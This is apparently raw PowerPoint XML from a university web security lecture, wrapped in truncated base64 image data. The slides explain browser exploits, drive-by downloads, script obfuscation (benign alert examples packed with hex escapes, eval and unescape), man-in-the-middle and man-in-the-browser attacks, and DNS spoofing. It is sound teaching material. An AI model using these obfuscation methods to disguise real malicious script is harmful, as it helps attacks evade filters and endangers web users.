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"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="155575" y="-1409700"/>
            <a:ext cx="2667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9472" name="Picture 16" descr="https://devimages.apple.com.edgekey.net/programs/safari/images/safari-logo-l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66950"/>
            <a:ext cx="1901825" cy="2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media.engadget.com/img/product/15/brs/chrome-os-2odl-80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813" y="971550"/>
            <a:ext cx="2268107" cy="170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945983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BROWSER EXPLOIT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Browser downloads, renders and executes maliciously crafted web content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploits vulnerabilities in the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Known</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unknown, AKA “Zero Day”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often executes shellcode via the browser script engine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typically a multi-step process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lure user to site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User-initiated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Drive-by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download/Execute actual payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Payload can be any malware, does not need to be web-centric.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38153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CONTENT/SCRIPT OBFUSCATION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Can’t we just filter malicious-looking page content?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use advanced text processing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser plugin or proxy server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Block content we deem malicious.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malware Obfuscation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rename script variables to meaningless, short, difficult to read text.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remove any whitespace, make a massive block of text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Self-generating code.   Must be executed to create ‘itself’, which is then executed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heavy use of eval statement with character codes, string manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Various encryption methods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38455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CONTENT/SCRIPT OBFUSCATION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5839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000" y="1077039"/>
            <a:ext cx="8382000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_0xc6b4=["\x6F\x6E\x6C\x6F\x61\x64", "\x48\x65\x6C\x6C\x6F\x20"];window.[_0xc6b4[0]]= function (){alert(_0xc6b4[1]+username);} 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eval(unescape("var%20_0xc6b4%3D%5B%22onload%22%2C%22Hello%20%22%5D%3Bwindow"+ "%5B_0xc6b4%5B0%5D%5D%3Dfunction%20%28%29%7Balert%28_0xc6b4%5B1%5D+username"+ "%29%3B%7D%20%3B"));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window.onload = function() { alert("Hello " + username) };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1182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CONTENT/SCRIPT OBFUSCATION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5839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1000" y="784653"/>
            <a:ext cx="8382000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(function(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p,a,c,k,e,r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){e=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String;if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(!''.replace(/^/,String)){while(c--)r[c]=k[c]||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c;k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=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=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p.replace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('\\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b'+e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(c)+'\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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b','g</a:t>
            </a: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'),k[c]);return p}('&lt;0&gt;1(\'2 3 4\')&lt;/0&gt;',5,5,'script|alert|Welcome|to|OSU'.split('|'),0,{}))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&lt;script&gt;alert('Welcome to OSU')&lt;/script&gt;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6287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Man-in-the-middle-attack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Intercept and modify traffic in real-time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Requires ability for mid-traffic insertion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DNS poisoning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Hacking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ARP Attack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Rogue or infected Router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Rogue Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP, a text-based transport protocol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Very easy to intercept – (HTTP)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Sort of easy to intercept (HTTPS)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Rewrite content in-line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Proxy-level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Packet-level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962150"/>
            <a:ext cx="1766807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630381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IN THE BROWSER (MITB)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MegaCorp is the most secure company in the world.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Firewalls, gateway devices, LANs, and WAN links – all rock solid and airtight.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How does the criminal hacker get a toehold?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Answer!! Bob in accounting likes to watch cat videos at home, while doing work via the corporate VPN.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dangerous cousin to the MITM attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intercept and modify traffic to/from the server, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>INSIDE THE BROWSER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Change financial account numbers mid-stream, during a funds transfer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Sniff and steal passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Port-scan web-users internal network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Browser exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Plug-in exploit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>New HTML5 features such as web sockets and web workers.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4318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 – SESSION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800" dirty="0"/>
              <a:t>Topics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Overflow/Questions/Answers from Session 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Web security research tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>URL Classification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Lab 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>More </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>WebGoat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>URL Classification system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Homework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Build a micro URL classification system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Feature Extractor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Rule engine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8551760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SPOOFING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Which do you use?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://1.2.3.4/onlinebanking/login.html</a:t>
            </a:r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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://banking.example/onlinebanking/login.html</a:t>
            </a:r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DNS Spoofing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AKA “DNS Cache Poisoning”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Browser asks for legit domain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ISP DNS server returns malicious IP, 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since it has poison cache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Browser fetches content from malicious</a:t>
            </a:r>
            <a:b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</a:br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 IP using correct host in HTTP header.</a:t>
            </a:r>
          </a:p>
          <a:p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Uses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Phishing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ourier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 2" descr="data:image/jpeg;base64,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